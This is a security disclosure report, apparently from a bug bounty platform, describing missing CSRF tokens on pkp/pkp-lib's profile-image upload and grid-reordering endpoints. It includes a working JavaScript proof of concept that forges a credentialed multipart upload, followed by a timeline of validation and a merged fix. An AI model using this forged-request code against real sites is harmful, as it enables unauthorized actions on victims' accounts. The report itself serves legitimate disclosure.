Cross-Site Request Forgery (CSRF) in pkp/pkp-lib


Reported on Oct 16th 2021


No CSRF protection on the upload profile image endpoint either: /index.php/e/$$$call$$$/tab/user/profile-tab/upload-profile-image.

More endpoints:

Reordering data:



PoC for the upload endpoint

        // Cross-site PoC: a page on an attacker-controlled origin submits a
        // multipart upload to the profile-image handler. The browser attaches
        // the victim's session cookie (withCredentials), and the handler does
        // not require a CSRF token, so the upload is accepted.
        var xhr = new XMLHttpRequest();
        // The URL is relative in the original PoC; a hosted PoC needs the
        // absolute URL of the target site.
        xhr.open("POST", "$$$call$$$/tab/user/profile-tab/upload-profile-image", true);
        xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
        xhr.setRequestHeader("Accept-Language", "de-de,de;q=0.8,en-us;q=0.5,en;q=0.3");
        xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------moxieboundary1634260375680");
        xhr.withCredentials = true;
        var body = "-----------------------------moxieboundary1634260375680\r\n" +
          "Content-Disposition: form-data; name=\"name\"\r\n" +
          "\r\n" + "cat.jpg" +
          "\r\n" +
          "-----------------------------moxieboundary1634260375680\r\n" +
          "Content-Disposition: form-data; name=\"uploadedFile\"; filename=\"cat.jpg\"\r\n" +
          "Content-Type: text/xml\r\n" +
          "\r\n" +
          "[FILE_CONTENT_HERE]" + "\r\n" +
          // Closing boundary (trailing "--") terminates the multipart body.
          "-----------------------------moxieboundary1634260375680--\r\n";
        // Send the body as raw bytes so the multipart framing is not re-encoded.
        var aBody = new Uint8Array(body.length);
        for (var i = 0; i < aBody.length; i++)
          aBody[i] = body.charCodeAt(i);
        xhr.send(new Blob([aBody]));


This vulnerability is capable of tricking users into changing their user profile picture.


no token in the upload profile frontend

no token in the upload profile backend

no token in save category grid sequence backend

no token in the save grid sequence backend

We have contacted a member of the pkp/pkp-lib team and are waiting to hear back. (a year ago)
haxatron modified the report. (a year ago)
Alec Smecher validated this vulnerability. (a year ago)
haxatron has been awarded the disclosure bounty.
The fix bounty is now up for grabs.
Alec Smecher confirmed that a fix has been merged on 169885. (a year ago)
Alec Smecher has been awarded the fix bounty.

Alec Smecher (a year ago):

Note that the two CSRF checks are added in separate commits; I flagged one of them as the fix. Both are:
